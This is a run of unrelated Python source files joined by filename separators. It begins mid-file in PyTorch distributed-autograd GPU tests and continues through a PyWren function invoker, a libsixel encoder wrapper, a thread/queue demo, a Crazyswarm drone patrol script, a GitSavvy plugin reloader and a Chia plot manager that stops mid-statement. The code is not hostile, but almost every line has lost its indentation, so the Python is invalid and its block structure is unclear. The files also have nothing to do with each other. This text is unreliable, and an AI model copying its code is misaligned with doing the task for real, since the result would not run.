# invoked by the previous rpc.remote thread which does not have a
# valid context_id. So, this can test whether we propagate
# thread_local states properly when jumping across threads on the
# server side.
dist_autograd.backward(context_id, [loss])
self.assertTrue(
rpc.rpc_sync(
dst,
_compare_owner_value,
args=(context_id, rref, t3.grad)
)
)
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_simple(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
(t1 + t2).sum().backward()
with dist_autograd.context() as context_id:
t3 = t1 + t2
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
# Root is CPU
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
t7 = self._exec_func(exec_mode, torch.add, t6.cpu(), t5)
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t7.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@skip_if_lt_x_gpu(1)
@dist_init
def test_gpu_to_cpu_continuation_gpu_root(self):
t1 = torch.rand(3, 3, requires_grad=True, device="cuda:0")
t2 = torch.rand(3, 3, requires_grad=True)
# Run a few iterations.
for i in range(3):
t1.grad = None
t2.grad = None
            # Root is on the GPU for this test (t6 lives on cuda:0)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
t3 = self._exec_func(exec_mode, torch.add, t2, t2)
t4 = t3.cuda(0) + t1
t5 = self._exec_func(exec_mode, torch.add, t4.cpu(), t2)
t6 = t5.cuda(0) + t4
# Autograd graph consists of CPU -> GPU -> CPU execution.
ret = self._verify_backwards(
exec_mode, [t6.sum()], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
class FaultyAgentDistAutogradTest(RpcAgentTestFixture):
# Reusing a simplified helper function from DistAutogradTest to ensure
# autograd context is successfully cleaned up even when RPCs are failing.
def context_cleanup_test_helper(self, rpc_args, func):
initialize_pg(self.file_init_method, self.rank, self.world_size)
        # Test that in dist autograd, when tensors communicated over RPC do
        # NOT require grad, we still clean up the dist autograd contexts created
        # on other nodes. This is because the autograd context is still
        # communicated over RPC even if the tensor arguments do not require grad,
        # as it is possible that the response could require grad.
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_PROCESS_GROUP)
self.assertEqual(self.rpc_backend_options.num_send_recv_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
class TensorPipeDistAutogradTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(4)
def test_device_maps_backward_pass(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
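        # e.g. on rank 0 this maps the local cuda:0 to the peer's cuda:1; gradients in
        # the backward pass are expected to flow back through the inverse of this map.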
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t1 = torch.rand(10, device=self.rank, requires_grad=True)
t2 = torch.rand(10, device=self.rank, requires_grad=True)
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(dst, torch.add, args=(t1, t2))
dist_autograd.backward(context_id, [res.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(torch.ones(10), grads[t1])
self.assertEqual(torch.ones(10), grads[t2])
self.assertEqual(t1.device, grads[t1].device)
self.assertEqual(t2.device, grads[t2].device)
rpc.shutdown()
class MyRemoteCompute(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, input):
input = input * 2.0
return input
class MyLocalCompute(torch.nn.Module):
def __init__(self, next_stage):
super().__init__()
self.next_stage = next_stage
def forward(self, input):
return self.next_stage.rpc_sync().forward(input)
@skip_if_lt_x_gpu(4)
def test_dist_autograd_sync_streams(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
# The reverse of this device mapping should be used for the backward pass.
options.set_device_map(dst, {self.rank: (self.rank + 1) % self.world_size})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
remote_compute = rpc.remote(dst, TensorPipeDistAutogradTest.MyRemoteCompute)
local_compute = TensorPipeDistAutogradTest.MyLocalCompute(remote_compute)
for _ in range(10):
input = torch.rand([1000, 10000], device=self.rank, requires_grad=True)
# Run local autograd
result = input * 2.0
r = random.random()
loss = result.sum() * r
loss.backward()
# Run distributed autograd
with dist_autograd.context() as context_id:
result = local_compute(input)
loss = result.sum() * r
dist_autograd.backward(context_id, [loss])
# Compare grads.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(input.grad, grads[input])
rpc.shutdown()
|
invoker.py
|
#
# (C) Copyright IBM Corp. 2019
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import logging
import random
from types import SimpleNamespace
from multiprocessing import Process, Queue
from pywren_ibm_cloud.compute import Compute
from pywren_ibm_cloud.invoker import JobMonitor
from pywren_ibm_cloud.storage import InternalStorage
from pywren_ibm_cloud.version import __version__
from concurrent.futures import ThreadPoolExecutor
from pywren_ibm_cloud.config import cloud_logging_config, extract_compute_config, extract_storage_config
logging.getLogger('pika').setLevel(logging.CRITICAL)
logger = logging.getLogger('invoker')
def function_invoker(event):
if __version__ != event['pywren_version']:
raise Exception("WRONGVERSION", "PyWren version mismatch",
__version__, event['pywren_version'])
log_level = event['log_level']
cloud_logging_config(log_level)
log_level = logging.getLevelName(logger.getEffectiveLevel())
custom_env = {'PYWREN_FUNCTION': 'True',
'PYTHONUNBUFFERED': 'True',
'PYWREN_LOGLEVEL': log_level}
os.environ.update(custom_env)
config = event['config']
invoker = FunctionInvoker(config, log_level)
invoker.run(event['job_description'])
class FunctionInvoker:
"""
    Module responsible for performing the invocations against the compute backend
"""
def __init__(self, config, log_level):
self.config = config
self.log_level = log_level
storage_config = extract_storage_config(self.config)
self.internal_storage = InternalStorage(storage_config)
compute_config = extract_compute_config(self.config)
self.remote_invoker = self.config['pywren'].get('remote_invoker', False)
self.rabbitmq_monitor = self.config['pywren'].get('rabbitmq_monitor', False)
if self.rabbitmq_monitor:
self.rabbit_amqp_url = self.config['rabbitmq'].get('amqp_url')
self.workers = self.config['pywren'].get('workers')
logger.debug('Total workers: {}'.format(self.workers))
self.compute_handlers = []
cb = compute_config['backend']
regions = compute_config[cb].get('region')
        if regions and isinstance(regions, list):
for region in regions:
new_compute_config = compute_config.copy()
new_compute_config[cb]['region'] = region
self.compute_handlers.append(Compute(new_compute_config))
else:
self.compute_handlers.append(Compute(compute_config))
self.token_bucket_q = Queue()
self.pending_calls_q = Queue()
self.job_monitor = JobMonitor(self.config, self.internal_storage, self.token_bucket_q)
def _invoke(self, job, call_id):
"""
Method used to perform the actual invocation against the Compute Backend
"""
payload = {'config': self.config,
'log_level': self.log_level,
'func_key': job.func_key,
'data_key': job.data_key,
'extra_env': job.extra_env,
'execution_timeout': job.execution_timeout,
'data_byte_range': job.data_ranges[int(call_id)],
'executor_id': job.executor_id,
'job_id': job.job_id,
'call_id': call_id,
'host_submit_time': time.time(),
'pywren_version': __version__,
'runtime_name': job.runtime_name,
'runtime_memory': job.runtime_memory}
# do the invocation
start = time.time()
compute_handler = random.choice(self.compute_handlers)
activation_id = compute_handler.invoke(job.runtime_name, job.runtime_memory, payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if not activation_id:
self.pending_calls_q.put((job, call_id))
return
logger.info('ExecutorID {} | JobID {} - Function invocation {} done! ({}s) - Activation'
' ID: {}'.format(job.executor_id, job.job_id, call_id, resp_time, activation_id))
return call_id
def run(self, job_description):
"""
Run a job described in job_description
"""
job = SimpleNamespace(**job_description)
log_msg = ('ExecutorID {} | JobID {} - Starting function invocation: {}() - Total: {} '
'activations'.format(job.executor_id, job.job_id, job.function_name, job.total_calls))
logger.info(log_msg)
self.total_calls = job.total_calls
for i in range(self.workers):
self.token_bucket_q.put('#')
for i in range(job.total_calls):
call_id = "{:05d}".format(i)
self.pending_calls_q.put((job, call_id))
self.job_monitor.start_job_monitoring(job)
invokers = []
for inv_id in range(4):
p = Process(target=self._run_process, args=(inv_id, ))
invokers.append(p)
p.daemon = True
p.start()
for p in invokers:
p.join()
def _run_process(self, inv_id):
"""
        Invoker process that implements the token-bucket scheduling approach
"""
logger.info('Invoker process {} started'.format(inv_id))
call_futures = []
with ThreadPoolExecutor(max_workers=250) as executor:
# TODO: Change pending_calls_q check
while self.pending_calls_q.qsize() > 0:
self.token_bucket_q.get()
job, call_id = self.pending_calls_q.get()
future = executor.submit(self._invoke, job, call_id)
call_futures.append(future)
logger.info('Invoker process {} finished'.format(inv_id))
|
encoder.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2014-2016 Hayaki Saito
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from . import _sixel
from libsixel import *
class Encoder:
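    # Thin wrapper around the libsixel encoder API: each method forwards to the
    # corresponding sixel_encoder_* binding, and the underlying handle is released
    # in __del__ via sixel_encoder_unref().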
def __init__(self):
self._encoder = sixel_encoder_new()
def __del__(self):
sixel_encoder_unref(self._encoder)
def setopt(self, flag, arg=None):
sixel_encoder_setopt(self._encoder, flag, arg)
def encode(self, filename="-"):
sixel_encoder_encode(self._encoder, filename)
def encode_bytes(self, buf, width, height, pixelformat, palette):
sixel_encoder_encode_bytes(self._encoder, buf, width, height, pixelformat, palette)
def test(self, filename):
import threading
self.setopt(SIXEL_OPTFLAG_COLORS, 16)
self.setopt(SIXEL_OPTFLAG_DIFFUSION, "atkinson")
self.setopt(SIXEL_OPTFLAG_WIDTH, 200)
t = threading.Thread(target=self.encode, args=[filename])
t.daemon = True
t.start()
try:
while t.is_alive():
t.join(1)
except KeyboardInterrupt:
print("\033\\\033[Jcanceled.")
if __name__ == '__main__':
import sys
arg1 = "-" if len(sys.argv) < 2 else sys.argv[1]
Encoder().test(arg1)
|
run_second_thread.py
|
from queue import Queue
import threading
from time import sleep
def worker(batch_queue):
i = batch_queue.get()
while i is not None:
        print('WORKER: I am working on item {}'.format(i))
sleep(3)
i = batch_queue.get()
def upload(i, batch_queue):
print('This is {} work'.format(i))
batch_queue.put(i)
sleep(2)
if __name__ == "__main__":
    # Create a queue for DB upload batches; a dedicated thread will consume it
batch_queue = Queue()
upload_thread = threading.Thread(target=worker, args=(batch_queue,))
upload_thread.daemon = True
print('Start upload to db thread...')
upload_thread.start()
for i in range(10):
upload(i, batch_queue)
    print('Putting an empty batch so the worker knows it is time to finish')
batch_queue.put(None)
upload_thread.join()
|
test_ca.py
|
import numpy as np
import threading
from pycrazyswarm import *
from time import sleep, ctime
import scipy as sp
radii = 0.7
class Waypoint:
def __init__(self, agent, x, y, z, arrival, duration):
self.agent = agent
self.x = x
self.y = y
self.z = z
self.arrival = arrival
self.duration = duration
def __lt__(self, other):
return self.arrival < other.arrival
def __repr__(self):
return "Ag {} at {} s. [{}, {}, {}]".format(self.agent, self.arrival, self.x, self.y, self.z)
def load_waypoint(filepath):
# load csv file
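    # Expected CSV layout (inferred from the parsing below): a header row followed by
    # one row per waypoint with columns agent_id, x, y, z, arrival_time.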
data = np.loadtxt(filepath, skiprows=1, delimiter=',')
    data = data[data[:, 0].argsort()]  # sort rows by agent id
# convert to internal data structure
waypoints = []
lastAgent = None
for row in data:
if lastAgent is None or lastAgent != row[0]:
lastTime = 0.0
waypoints.append(Waypoint(int(row[0]), row[1], row[2], row[3], row[4], row[4] - lastTime))
lastTime = row[4]
lastAgent = int(row[0])
# sort waypoints by arrival time
waypoints.sort()
return waypoints
def obstacle_avoidance(cfs, tello, radii):
    while True:
for cf in cfs:
dist = np.sqrt((cf.state.pos.x - tello.state.pos.x)**2 + (cf.state.pos.y - tello.state.pos.y)**2 + (cf.state.pos.z - tello.state.pos.z)**2)
if dist < radii:
pos = [cf.state.pos.x, cf.state.pos.y, cf.state.pos.z + 1.0]
cf.goTo(pos, 0, 1.0)
if __name__ == "__main__":
waypoints = load_waypoint("waypoints6.csv")
swarm = Crazyswarm()
timeHelper = swarm.timeHelper
allcfs = swarm.allcfs
cf6 = allcfs.crazyfliesById[7]
cf6.setLEDColor(1,0.5,0.5)
# collision avoidance
cfs = allcfs.crazyflies
cfs_ca = cfs[:-1]
other = cfs[-1]
thread_ca = threading.Thread(target = obstacle_avoidance, args = (cfs_ca, other, radii))
thread_ca.start()
# thread_ca.join()
# patrol
allcfs.takeoff(targetHeight=1.0, duration=2.0)
timeHelper.sleep(2.0)
lastTime = 0.0
    while True:
for waypoint in waypoints:
if waypoint.arrival == 0:
pos = [waypoint.x, waypoint.y, waypoint.z]
cf = allcfs.crazyfliesById[waypoint.agent]
cf.goTo(pos, 0, 2.0)
elif waypoint.duration > 0:
timeHelper.sleep(waypoint.arrival - lastTime)
lastTime = waypoint.arrival
pos = [waypoint.x, waypoint.y, waypoint.z]
cf = allcfs.crazyfliesById[waypoint.agent]
cf.goTo(pos, 0, waypoint.duration)
waypoint.arrival = waypoint.arrival + 20.0
# land
allcfs.land(targetHeight=0.02, duration=2.0)
timeHelper.sleep(2.0)
|
reload.py
|
import sublime
import sublime_plugin
import os
import posixpath
import threading
import builtins
import functools
import importlib
import sys
from inspect import ismodule
from contextlib import contextmanager
from .debug import StackMeter
try:
from package_control.package_manager import PackageManager
def is_dependency(pkg_name):
return PackageManager()._is_dependency(pkg_name)
except ImportError:
def is_dependency(pkg_name):
return False
def reload_plugin(verbose=True, then=None):
threading.Thread(
target=functools.partial(reload_package, 'GitSavvy', verbose=verbose, then=then)
).start()
def dprint(*args, fill=None, fill_width=60, **kwargs):
if fill is not None:
sep = str(kwargs.get('sep', ' '))
caption = sep.join(args)
args = "{0:{fill}<{width}}".format(caption and caption + sep,
fill=fill, width=fill_width),
print("[Package Reloader]", *args, **kwargs)
def path_contains(a, b):
return a == b or b.startswith(a + os.sep)
def get_package_modules(pkg_name):
in_installed_path = functools.partial(
path_contains,
os.path.join(
sublime.installed_packages_path(),
pkg_name + '.sublime-package'
)
)
in_package_path = functools.partial(
path_contains,
os.path.join(sublime.packages_path(), pkg_name)
)
def module_in_package(module):
file = getattr(module, '__file__', '')
paths = getattr(module, '__path__', ())
return (
in_installed_path(file) or any(map(in_installed_path, paths)) or
in_package_path(file) or any(map(in_package_path, paths))
)
return {
name: module
for name, module in sys.modules.items()
if module_in_package(module)
}
def package_plugins(pkg_name):
return [
pkg_name + '.' + posixpath.basename(posixpath.splitext(path)[0])
for path in sublime.find_resources("*.py")
if posixpath.dirname(path) == 'Packages/' + pkg_name
]
def reload_package(pkg_name, dummy=True, verbose=True, then=None):
if pkg_name not in sys.modules:
dprint("error:", pkg_name, "is not loaded.")
return
if is_dependency(pkg_name):
dependencies, packages = resolve_dependencies(pkg_name)
else:
dependencies = set()
packages = {pkg_name}
if verbose:
dprint("begin", fill='=')
all_modules = {
module_name: module
for pkg_name in dependencies | packages
for module_name, module in get_package_modules(pkg_name).items()
}
# Tell Sublime to unload plugins
for pkg_name in packages:
for plugin in package_plugins(pkg_name):
module = sys.modules.get(plugin)
if module:
sublime_plugin.unload_module(module)
# Unload modules
for module_name in all_modules:
sys.modules.pop(module_name)
# Reload packages
try:
        with intercepting_imports(all_modules, verbose), importing_fromlist_aggressively(all_modules):
for pkg_name in packages:
for plugin in package_plugins(pkg_name):
sublime_plugin.reload_plugin(plugin)
except Exception:
dprint("reload failed.", fill='-')
reload_missing(all_modules, verbose)
raise
if dummy:
load_dummy(verbose)
if verbose:
dprint("end", fill='-')
if then:
then()
sublime.active_window().status_message('GitSavvy has 🙌 reloaded.')
def resolve_dependencies(root_name):
"""Given the name of a dependency, return all dependencies and packages
that require that dependency, directly or indirectly.
"""
manager = PackageManager()
all_packages = manager.list_packages()
all_dependencies = manager.list_dependencies()
recursive_dependencies = set()
dependent_packages = set()
dependency_relationships = {
name: manager.get_dependencies(name)
for name in all_packages + all_dependencies
}
def rec(name):
if name in recursive_dependencies:
return
recursive_dependencies.add(name)
for dep_name in all_dependencies:
if name in dependency_relationships[dep_name]:
rec(dep_name)
for pkg_name in all_packages:
if name in dependency_relationships[pkg_name]:
dependent_packages.add(pkg_name)
rec(root_name)
return (recursive_dependencies, dependent_packages)
def load_dummy(verbose):
"""
Hack to trigger automatic "reloading plugins".
This is needed to ensure TextCommand's and WindowCommand's are ready.
"""
if verbose:
dprint("installing dummy package")
dummy = "_dummy_package"
dummy_py = os.path.join(sublime.packages_path(), "%s.py" % dummy)
with open(dummy_py, "w"):
pass
def remove_dummy(trial=0):
if dummy in sys.modules:
if verbose:
dprint("removing dummy package")
try:
os.unlink(dummy_py)
except FileNotFoundError:
pass
after_remove_dummy()
elif trial < 300:
threading.Timer(0.1, lambda: remove_dummy(trial + 1)).start()
else:
try:
os.unlink(dummy_py)
except FileNotFoundError:
pass
condition = threading.Condition()
def after_remove_dummy(trial=0):
if dummy not in sys.modules:
condition.acquire()
condition.notify()
condition.release()
elif trial < 300:
threading.Timer(0.1, lambda: after_remove_dummy(trial + 1)).start()
threading.Timer(0.1, remove_dummy).start()
condition.acquire()
condition.wait(30) # 30 seconds should be enough for all regular usages
condition.release()
def reload_missing(modules, verbose):
missing_modules = {name: module for name, module in modules.items()
if name not in sys.modules}
if missing_modules:
if verbose:
dprint("reload missing modules")
for name in missing_modules:
if verbose:
dprint("reloading missing module", name)
sys.modules[name] = modules[name]
@contextmanager
def intercepting_imports(modules, verbose):
finder = FilterFinder(modules, verbose)
sys.meta_path.insert(0, finder)
try:
yield
finally:
if finder in sys.meta_path:
sys.meta_path.remove(finder)
@contextmanager
def importing_fromlist_aggressively(modules):
orig___import__ = builtins.__import__
@functools.wraps(orig___import__)
def __import__(name, globals=None, locals=None, fromlist=(), level=0):
module = orig___import__(name, globals, locals, fromlist, level)
if fromlist and module.__name__ in modules:
if '*' in fromlist:
fromlist = list(fromlist)
fromlist.remove('*')
fromlist.extend(getattr(module, '__all__', []))
for x in fromlist:
if ismodule(getattr(module, x, None)):
from_name = '{}.{}'.format(module.__name__, x)
if from_name in modules:
importlib.import_module(from_name)
return module
builtins.__import__ = __import__
try:
yield
finally:
builtins.__import__ = orig___import__
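# FilterFinder is installed on sys.meta_path by intercepting_imports(): find_module()
# claims only the modules captured before the reload, and load_module() re-executes
# each of them through its original loader while printing a nesting-depth trace.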
class FilterFinder:
def __init__(self, modules, verbose):
self._modules = modules
self._stack_meter = StackMeter()
self._verbose = verbose
def find_module(self, name, path=None):
if name in self._modules:
return self
def load_module(self, name):
module = self._modules[name]
sys.modules[name] = module # restore the module back
with self._stack_meter as depth:
if self._verbose:
dprint("reloading", ('| ' * depth) + '|--', name)
try:
return module.__loader__.load_module(name)
except Exception:
if name in sys.modules:
del sys.modules[name] # to indicate an error
raise
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Iterator
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from chia.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from chia.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
stream_plot_info_pk,
stream_plot_info_ph,
)
from chia.util.ints import uint16
from chia.util.path import mkdir
from chia.util.streamable import Streamable, streamable
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
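    # In-memory plot_id -> CacheEntry map, persisted to `path` through the streamable
    # DiskCache wrapper; `_changed` tracks whether the cache needs to be written back.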
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
show_memo: bool
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
show_memo: bool = False,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.show_memo = show_memo
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
def batches() -> Iterator[Tuple[int, List[Path]]]:
if total_size > 0:
for batch_start in range(0, total_size, self.refresh_parameter.batch_size):
batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size)
yield total_size - batch_end, plot_paths[batch_start:batch_end]
else:
yield 0, []
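            # For example, with total_size = 250 and batch_size = 100, batches() yields
            # (150, plot_paths[0:100]), (50, plot_paths[100:200]) and (0, plot_paths[200:250]).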
for remaining, batch in batches():
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
                # Set the remaining file count since `refresh_batch()` doesn't know it but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.removed += batch_result.removed
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {total_result.loaded}, "
f"total_result.removed {total_result.removed}, "
f"total_duration {total_result.duration:.2f} seconds"
)
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if not file_path.exists():
return None
if (
file_path in self.failed_to_open_filenames
